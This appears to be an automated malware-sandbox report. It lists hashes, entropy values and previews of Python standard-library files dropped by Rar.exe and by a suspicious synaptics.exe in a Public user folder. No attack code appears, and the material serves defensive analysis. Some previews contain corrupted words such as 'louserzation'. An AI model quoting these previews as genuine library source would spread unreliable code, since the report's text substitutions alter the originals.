                                                                                                                                                                                      SHA-256:AF973E4F1A157C6D1AF2F16A63B384A6DFED0D64880A56DB96EA4E0D8D6EB12D
                                                                                                                                                                                      SHA-512:DCF9E0486490263D30B60FC1CF1800A1763B6E3DF23CD77C11CF83D7C1AC8ABB34EBF522895BC88D5F409E59C2D93663926D1CA2FAE520631722FDC45E5106D3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Originally contributed by Sjoerd Mullender...# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>....."""Fraction, infinite-precision, real numbers."""....from decimal import Decimal..import math..import numbers..import operator..import re..import sys....__all__ = ['Fraction']......# Constants related to the hash implementation; hash(x) is based..# on the reduction of x modulo the prime _PyHASH_MODULUS..._PyHASH_MODULUS = sys.hash_info.modulus..# Value to be used for rationals that reduce to infinity modulo..# _PyHASH_MODULUS..._PyHASH_INF = sys.hash_info.inf...._RATIONAL_FORMAT = re.compile(r""".. \A\s* # optional whitespace at the start, then.. (?P<sign>[-+]?) # an optional sign, then.. (?=\d|\.\d) # lookahead for digit or .digit.. (?P<num>\d*) # numerator (possibly empty).. (?: # followed by.. (?:/(?P<denom>\d+))? # an optional denominator.. |
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):36477
                                                                                                                                                                                      Entropy (8bit):4.494220235473389
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:xp+qv4dk/rJQJ9+Lx8CDSh8Y+3+amueaw+QHCRi3LdO:xpDTzJQJiDSh8Y+3+fzKEei3L8
                                                                                                                                                                                      MD5:B14842A034453578318FD0ACD801A0CC
                                                                                                                                                                                      SHA1:6E4F32C29E9296DCE1452ACE023894F0E1A8B756
                                                                                                                                                                                      SHA-256:B85739A95BE5A2374013E9892DBFA5AC75312024EF7EBB9BCB4102B0F5BF0F82
                                                                                                                                                                                      SHA-512:58A628BBC100E1CA623ADA41C2E79302B15A1ED6E5920F385ED26B711383C01483F150AB3DFD39C8A07834A1FCA68F90AE3B4F2CCB59DB8280ED812F93320962
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""An FTP client class and some helper functions.....Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds....Example:....>>> from ftplib import FTP..>>> ftp = FTP('ftp.python.org') # connect to host, default port..>>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@..'230 Guest login ok, access restrictions apply.'..>>> ftp.retrlines('LIST') # list directory contents..total 9..drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ...drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ....drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin..drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc..d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming..drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib..drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub..drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr..-rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg..'226 Transfer complete.'..>>> ft
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):39068
                                                                                                                                                                                      Entropy (8bit):4.558893536012342
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:sWkKM+qgJeCAkxPN2NqXBF7sMHrCXZdgbV6TeLCD+26:sWkfgJeCAk7v7sMHrCpEWB6
                                                                                                                                                                                      MD5:E451C9675E4233DE278ACF700AC7395F
                                                                                                                                                                                      SHA1:1E7D4C5DB5FC692540C31E1B4DB4679051EB5DF8
                                                                                                                                                                                      SHA-256:B4698D03B4D366F2B032F5DE66B8181ED8E371C0D7D714B7672432E18D80636B
                                                                                                                                                                                      SHA-512:4DB40159DB7427CE05D36AA3A6B05151742E6C122DFBDC679C10DCC667FC999FF1302BB2E2BE6F58B895911CF436B27AD78FD64CCF077DEB94046667520111B9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""functools.py - Tools for working with functions and callable objects.."""..# Python module wrapper for _functools C module..# to allow utilities written in Python to be added..# to the functools module...# Written by Nick Coghlan <ncoghlan at gmail.com>,..# Raymond Hettinger <python at rcn.com>,..# and .ukasz Langa <lukasz at langa.pl>...# Copyright (C) 2006-2013 Python Software Foundation...# See C source code for _functools credits/copyright....__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES',.. 'total_ordering', 'cache', 'cmp_to_key', 'lru_cache', 'reduce',.. 'partial', 'partialmethod', 'singledispatch', 'singledispatchmethod',.. 'cached_property']....from abc import get_cache_token..from collections import namedtuple..# import types, weakref # Deferred to single_dispatch()..from reprlib import recursive_repr..from _thread import RLock..from types import Generiuseras......#############################################
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5130
                                                                                                                                                                                      Entropy (8bit):4.610395495126573
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:jqn24r0OS60O04+jl2LyqSgPGfGeYM6Zf8lG4iuRs+laP8q+PCI7ocfz/r/j:jq24r0v60hLhWL+fuMeebiuRPr/r/j
                                                                                                                                                                                      MD5:5AD610407613DEFB331290EE02154C42
                                                                                                                                                                                      SHA1:3FF9028BDF7346385607B5A3235F5FF703BCF207
                                                                                                                                                                                      SHA-256:2E162781CD02127606F3F221FCAA19C183672D1D3E20FDB83FE9950AB5024244
                                                                                                                                                                                      SHA-512:9A742C168A6C708A06F4307ABCB92CEDE02400BF53A004669B08BD3757D8DB7C660934474EC379C0464E17FFD25310DBAB525B6991CF493E97DCD49C4038F9B7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Path operations common to more than one OS..Do not use directly. The OS specific modules import the appropriate..functions from this module themselves..."""..import os..import stat....__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',.. 'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',.. 'samestat']......# Does a path exist?..# This is false for dangling symbolic links on systems that support them...def exists(path):.. """Test whether a path exists. Returns False for broken symbolic links""".. try:.. os.stat(path).. except (OSError, ValueError):.. return False.. return True......# This follows symbolic links, so both islink() and isdir() can be true..# for the same path on systems that support symlinks..def isfile(path):.. """Test whether a path is a regular file""".. try:.. st = os.stat(path).. except (OSError, ValueError):.. return False.. return stat.S_ISREG(st.st_mode)......
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7704
                                                                                                                                                                                      Entropy (8bit):4.59015983026496
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oSGuBRjBdvQQ0ZWBX0RfUFCo/g/FF+44VJ3X0WNoO:oj0dH0ZWB+LBwJnkO
                                                                                                                                                                                      MD5:08EF4DCA79267E51C1CB8B9DB09C0CC8
                                                                                                                                                                                      SHA1:549CE2C250CF5D33DC427D29D3D387672B6BD3D2
                                                                                                                                                                                      SHA-256:42DDAA74BF0B85F684D1C4F40B1C460AEF05B8DBF6FD05FCA68D71D2A07F8AAF
                                                                                                                                                                                      SHA-512:4475B17CA19D985F2C5C017C99A17330BC8AD9FD07B560F472884FF7897284960BAA3A37DF5EE643C6B886715E87293B660D73B221A09D08BC32C1B9421439A6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Parser for command line options.....This module helps scripts to parse the command line arguments in..sys.argv. It supports the same conventions as the Unix getopt()..function (including the special meanings of arguments of the form `-'..and `--'). Long options similar to those supported by GNU software..may be used as well via an optional third argument. This module..provides two functions and an exception:....getopt() -- Parse command line options..gnu_getopt() -- Like getopt(), but allow option and non-option arguments..to be intermixed...GetoptError -- exception (class) raised with 'opt' attribute, which is the..option involved with the exception..."""....# Long option support added by Lars Wirzenius <liw@iki.fi>...#..# Gerrit Holl <gerrit@nl.linux.org> moved the string-based exceptions..# to class-based exceptions...#..# Peter .strand <astrand@lysator.liu.se> added gnu_getopt()...#..# TODO for gnu_getopt():..#..# - GNU getopt_long_only mechanism..# - allow the caller to spe
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6175
                                                                                                                                                                                      Entropy (8bit):4.440480314278831
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:PX8OzPyKo5dCMPUwl5o0FvZGNYAp83byrYl4Npx2AfeX2RMqdzNydJdCymzGFQ6Z:0OOVvTAlNppYsYmpxvxRMqtM39Q6qQJ
                                                                                                                                                                                      MD5:0F8B3481C15E6805AFAD8EAE8E770FA1
                                                                                                                                                                                      SHA1:25DDD71B1BD1F38E61A70C1B53E40F0752D328DF
                                                                                                                                                                                      SHA-256:D2B77376A296CBDD0F659DA6CAB047426A4719D3F09949ABA8F334BD01E80593
                                                                                                                                                                                      SHA-512:0E7EE49047339D8DF9D1F233C6EB47004B76D41EE324DACBBDDDA4C55D7C85CFBBFCDE3F9762B9B51AEC6007DEA4796852846A35B8094E61B8F9D472C838B348
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities to get a password and/or the current user name.....getpass(prompt[, stream]) - Prompt for a password, with echo turned off...getuser() - Get the user name from the environment or password database.....GetPassWarning - This UserWarning is issued when getpass() cannot prevent.. echoing of the password contents while reading.....On Windows, the msvcrt module will be used....."""....# Authors: Piers Lauder (original)..# Guido van Rossum (Windows support and cleanup)..# Gregory P. Smith (tty support & GetPassWarning)....import contextlib..import io..import os..import sys..import warnings....__all__ = ["getpass","getuser","GetPassWarning"]......class GetPassWarning(UserWarning): pass......def unix_getpass(prompt='Password: ', stream=None):.. """Prompt for a password, with echo turned off..... Args:.. prompt: Written on stream to ask for the input. Default: 'Password: '.. stream: A writable file object to display the prompt. Def
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28054
                                                                                                                                                                                      Entropy (8bit):4.498377159987173
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:8KE7Hoh/b92mxgRPkwKAUJLyFXtC6Q5j7KdrF3Ep77KmlnkqHJbKAit:8v2bjxgNkwKZZyG6aHKdrdmlnkht
                                                                                                                                                                                      MD5:FAF4F6D15309F3F0FF72B5250F4A572D
                                                                                                                                                                                      SHA1:132319D16F45EC0A6A39F5ED1253728F5AEFE9A1
                                                                                                                                                                                      SHA-256:0CFE0A76C6EE6A60BE2C0DD259B115AEFF96E2CAFEE3C5DDF108991EDD8CC527
                                                                                                                                                                                      SHA-512:1C22108C0B3C39B6B8670678E8DDDDFCEBCC6E2C3114784FEFA24D2111B5870CE538220120EC7C6C586A2AF4619B5D34B3142F2D3150D7B6B3CF653358278850
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Internationalization and louserzation support.....This module provides internationalization (I18N) and louserzation (L10N)..support for your Python programs by providing an interface to the GNU gettext..message catalog library.....I18N refers to the operation by which a program is made aware of multiple..languages. L10N refers to the adaptation of your program, once..internationalized, to the local language and cultural habits....."""....# This module represents the integration of work, contributions, feedback, and..# suggestions from the following people:..#..# Martin von Loewis, who wrote the initial implementation of the underlying..# C-based libintlmodule (later renamed _gettext), along with a skeletal..# gettext.py implementation...#..# Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule,..# which also included a pure-Python implementation to read .mo files if..# intlmodule wasn't available...#..# James Henstridge, who also wrote a gettext.py module, wh
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8125
                                                                                                                                                                                      Entropy (8bit):4.483744893777771
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:pFc4Arou6Aroegm/Mn76MRcjRDaaySlZLVixLOTu7tTy:pyPMAMxm/Mnnc9DaaXB4xnhu
                                                                                                                                                                                      MD5:9DABC8ECFFFB6F16FD59D418F35E21C3
                                                                                                                                                                                      SHA1:2FD0A0E2D52FBA4CE022A92033CCE7FFADE39BA5
                                                                                                                                                                                      SHA-256:BE68BE3D9A2052A254879D80A56CE69B6E6A9C1C82BBC7B3608CA8BA4749EF75
                                                                                                                                                                                      SHA-512:3CC5A9DA1D426FC128E76A5278D58B6DB40E81C4F4D64FED96A613DE7D3340425CA70E103EB84C4BCC766CD7C0F5ECA8691031E2300949C3642C2127C69C893C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Filename globbing utility."""....import contextlib..import os..import re..import fnmatch..import itertools..import stat..import sys....__all__ = ["glob", "iglob", "escape"]....def glob(pathname, *, root_dir=None, dir_fd=None, recursive=False):.. """Return a list of paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. However, unlike fnmatch, filenames starting with a.. dot are special cases that are not matched by '*' and '?'.. patterns..... If recursive is true, the pattern '**' will match any files and.. zero or more directories and subdirectories... """.. return list(iglob(pathname, root_dir=root_dir, dir_fd=dir_fd, recursive=recursive))....def iglob(pathname, *, root_dir=None, dir_fd=None, recursive=False):.. """Return an iterator which yields the paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. However, unlike fnmatch, filenames s
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9819
                                                                                                                                                                                      Entropy (8bit):4.255538830099529
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rNcRMEUR8YGCyTXFCRIBxgI1umbJrjMpxEIPktyaZN58Uff7yWPJyeTs7SD3Kqn2:piMEUmCyQMxgI0XEBX58UFXl+H
                                                                                                                                                                                      MD5:EE15C72D9CE4C8AC3566570A1B5ADB79
                                                                                                                                                                                      SHA1:14A72977DA46F96BAA3AA348AC77DE6F3CFC065C
                                                                                                                                                                                      SHA-256:2C618FBEF31D772844057C4CFA74BD90874CE0FD9FAB886E3597E4FCA8AEA7E7
                                                                                                                                                                                      SHA-512:19598987512034E50175FBAFB9F948595EA7FBD9CB4A7004DB55D56A770D964033E2441DE6F6B62D2CBD7B730A8CAB68A3CBFACE05447354B9AD66F4D1544F4E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:__all__ = ["TopologicalSorter", "CycleError"]...._NODE_OUT = -1.._NODE_DONE = -2......class _NodeInfo:.. __slots__ = "node", "npredecessors", "successors".... def __init__(self, node):.. # The node this class is augmenting... self.node = node.... # Number of predecessors, generally >= 0. When this value falls to 0,.. # and is returned by get_ready(), this is set to _NODE_OUT and when the.. # node is marked done by a call to done(), set to _NODE_DONE... self.npredecessors = 0.... # List of successor nodes. The list can contain duplicated elements as.. # long as they're all reflected in the successor's npredecessors attribute... self.successors = []......class CycleError(ValueError):.. """Subclass of ValueError raised by TopologicalSorter.prepare if cycles.. exist in the working graph..... If multiple cycles exist, only one undefined choice among them will be reported.. and included in the exception. The det
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22458
                                                                                                                                                                                      Entropy (8bit):4.493285652895645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:4rrWHTcJt2MIIfqSErRS7IO9a/86ZBbV7QywQXBnT:KJtpAU7huR7Q8T
                                                                                                                                                                                      MD5:97D3C070D8BAC4A2C8F92F64864C6814
                                                                                                                                                                                      SHA1:D621A5BB1939468B25D45216A794681BF1765431
                                                                                                                                                                                      SHA-256:AE72AA290F3AA83BDAA337D92C19B39E396F7BE984FB0F9B60F57464AAA18020
                                                                                                                                                                                      SHA-512:D56D16D5E1BBE29CC7CAECC2D74A1E44D21710A6E523AAF6E3B3B0E259502272A8C0F470A12526B5DFE575597D40285E480FEC6047EF16517A29E91868B50AB2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Functions that read and write gzipped files.....The user of the file doesn't have to worry about the compression,..but random access is not allowed."""....# based on Andrew Kuchling's minigzip.py distributed with the zlib module....import struct, sys, time, os..import zlib..import builtins..import io..import _compression....__all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"]....FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16....READ, WRITE = 1, 2...._COMPRESS_LEVEL_FAST = 1.._COMPRESS_LEVEL_TRADEOFF = 6.._COMPRESS_LEVEL_BEST = 9......def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST,.. encoding=None, errors=None, newline=None):.. """Open a gzip-compressed file in binary or text mode..... The filename argument can be an actual filename (a str or bytes object), or.. an existing file object to read from or write to..... The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for.. binary mode, or "rt", "wt",
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10498
                                                                                                                                                                                      Entropy (8bit):4.823698140650247
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:KSBDUhawz9fJ+8lOVaX2B916+jZVJ0tMmLfGfpR9eGe9IpeuR95x4TgDM4KAiu9k:KSBmfj2LEMmqpR+9u5d4H4JH9xx4v
                                                                                                                                                                                      MD5:21DD74815051864F290794402768F3B9
                                                                                                                                                                                      SHA1:A5D1E78B5C9172FE184D6B32B67848164EDEBB34
                                                                                                                                                                                      SHA-256:4F2CD247217F809905C3D7A3178EAE31D697C33CA42F06E9D2217DF86D4832A8
                                                                                                                                                                                      SHA-512:194464D2309DADBBB2CCB8217765F727BE9E86914EB67ECEA89332BAA8629A9E0C40A7707DDEB7DB768A2FC85DED20EF8D74FE03CDD78998B29EF374E9D74953
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#. Copyright (C) 2005-2010 Gregory P. Smith (greg@krypto.org)..# Licensed to PSF under a Contributor Agreement...#....__doc__ = """hashlib module - A common interface to many hash functions.....new(name, data=b'', **kwargs) - returns a new hash object implementing the.. given hash function; initializing the hash.. using the given binary data.....Named constructor functions are also available, these are faster..than using new(name):....md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),..sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256.....More algorithms may be available on your platform but the above are guaranteed..to exist. See the algorithms_guaranteed and algorithms_available attributes..to find out what algorithm names can be passed to new().....NOTE: If you want the adler32 or crc32 hash functions they are available in..the zlib module.....Choose your hash function wisely.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23478
                                                                                                                                                                                      Entropy (8bit):4.580828814586343
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:zIyh8ImoQ2TaWDxr0K6rNK3WahBUmYcqV3+oxjTe+ENxd1S2+HGRh:zIC8ImTiA5cgxjT4xdGH+
                                                                                                                                                                                      MD5:6D447DCB24E4E6EEB99B898F90736687
                                                                                                                                                                                      SHA1:2CF71707A9889363EAFE7616BD3C585A6897E882
                                                                                                                                                                                      SHA-256:F140027EAFEF0C3D3FC13D9B393F1A6F24069E5437BDE478E1B95EB47D3EA24D
                                                                                                                                                                                      SHA-512:EF2D1884A5B56EA3533760C382CAE2D345CCD5F0FE54D6063EAAB4E6A3E01581F312C076FA73A75BA5451E618653BCB1F937BC3D77E9956AB8C61AA3FE008CB7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Heap queue algorithm (a.k.a. priority queue).....Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for..all k, counting elements from 0. For the sake of comparison,..non-existing elements are considered to be infinite. The interesting..property of a heap is that a[0] is always its smallest element.....Usage:....heap = [] # creates an empty heap..heappush(heap, item) # pushes a new item on the heap..item = heappop(heap) # pops the smallest item from the heap..item = heap[0] # smallest item on the heap without popping it..heapify(x) # transforms list into a heap, in-place, in linear time..item = heapreplace(heap, item) # pops and returns smallest item, and adds.. # new item; the heap size is unchanged....Our API differs from textbook heap algorithms as follows:....- We use 0-based indexing. This makes the relationship between the.. index for a node and the indexes for its children slightly less.. obvious, but
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7936
                                                                                                                                                                                      Entropy (8bit):4.550266087115813
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6ko2Qnkb5tQl/eFrNry3HYO429+036i5BhzRG8j:6ko2QM5tQlmFrNr/O4L03HhzRD
                                                                                                                                                                                      MD5:A7308CEE7CED61CEA957D925076FB85B
                                                                                                                                                                                      SHA1:D23A21F8ADF650171695BCFFF239E974A783DF66
                                                                                                                                                                                      SHA-256:C9FC1D1AC2E1AF1FCB0976E9A7FFBE14B13A4177C0F39AF9639EA341338DC72C
                                                                                                                                                                                      SHA-512:7609E95ACB5BC5CBC570060D5E167E1E3A9A5035E3822580F4BAE7D17AC5C497DEE5F6DD0E80F46EBDDEA4985721FA4FCA055F379F5DC731DD70FFE0F36BFF7A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""HMAC (Keyed-Hashing for Message Authentication) module.....Implements the HMAC algorithm as described by RFC 2104..."""....import warnings as _warnings..try:.. import _hashlib as _hashopenssl..except ImportError:.. _hashopenssl = None.. _functype = None.. from _operator import _compare_digest as compare_digest..else:.. compare_digest = _hashopenssl.compare_digest.. _functype = type(_hashopenssl.openssl_sha256) # builtin type....import hashlib as _hashlib....trans_5C = bytes((x ^ 0x5C) for x in range(256))..trans_36 = bytes((x ^ 0x36) for x in range(256))....# The size of the digests returned by HMAC depends on the underlying..# hashing module used. Use digest_size from the instance of HMAC instead...digest_size = None......class HMAC:.. """RFC 2104 HMAC class. Also complies with RFC 4231..... This supports the API for Cryptographic Hash Functions (PEP 247)... """.. blocksize = 64 # 512-bit HMAC; can be changed in subclasses..... __slots__ = (..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6883
                                                                                                                                                                                      Entropy (8bit):5.095382966902921
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:FcbQSiy+TbKatPR4qXiasXh+O5ZSsB3CeAXI5UKj:F/yqXiasXzgep5UKj
                                                                                                                                                                                      MD5:26B5CF5F93FA25440187796DB6CCCE16
                                                                                                                                                                                      SHA1:7547272BDFA0BC9A9387CDE17FC5972B548E2593
                                                                                                                                                                                      SHA-256:6297DA88AB77CCED08A3C622C51292851CC95B8175B7342B4CD7F86595F73158
                                                                                                                                                                                      SHA-512:BD5737BFCE668B6F1513A00010C8A33E6D2841C709B4DFE86DA1A7EE51C78C27AB61DABA6E1F2599432EA4224D6E488F61F464AF385F5180A7F55EC9142D4F1A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from enum import IntEnum....__all__ = ['HTTPStatus']......class HTTPStatus(IntEnum):.. """HTTP status codes and reason phrases.... Status codes from the following RFCs are all observed:.... * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616.. * RFC 6585: Additional HTTP Status Codes.. * RFC 3229: Delta encoding in HTTP.. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518.. * RFC 5842: Binding Extensions to WebDAV.. * RFC 7238: Permanent Redirect.. * RFC 2295: Transparent Content Negotiation in HTTP.. * RFC 2774: An HTTP Extension Framework.. * RFC 7725: An HTTP Status Code to Report Legal Obstacles.. * RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2).. * RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0).. * RFC 8297: An HTTP Status Code for Indicating Hints.. * RFC 8470: Using Early Data in HTTP.. """.. def __new__(cls, value, phrase, descriptio
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6429
                                                                                                                                                                                      Entropy (8bit):5.803869223949154
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:PWZsdAR4kaBaNzpZOZBDcxHN/8O2OHb4k7:P6zpZOZBDcpNp2iT
                                                                                                                                                                                      MD5:586EC357280D9B2CA86F69BB80E2FD5E
                                                                                                                                                                                      SHA1:26AB9E4178641B100CE7AE624C5D9E549B217603
                                                                                                                                                                                      SHA-256:28069D9FE48F2786B99B404CF0A163A252CD87FE6EA554072F7E4D15A7712162
                                                                                                                                                                                      SHA-512:F1866F7E0205D50981AAD1CE2A6994119DD6E7958518CD664D007E9BD453EE11E59D88DA0F7955DBBD5602E35BB892B33DED2310836191072EE39B97C18067DC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35191
                                                                                                                                                                                      Entropy (8bit):5.379843073709396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:poG3ivqgYyeQcyEqVHpu/TTaC5TCW9ObjcDds:iG3HgYyeQcyEqVHpETH5Tj9UjYC
                                                                                                                                                                                      MD5:EF5292200A1832D99E13A310D1195E00
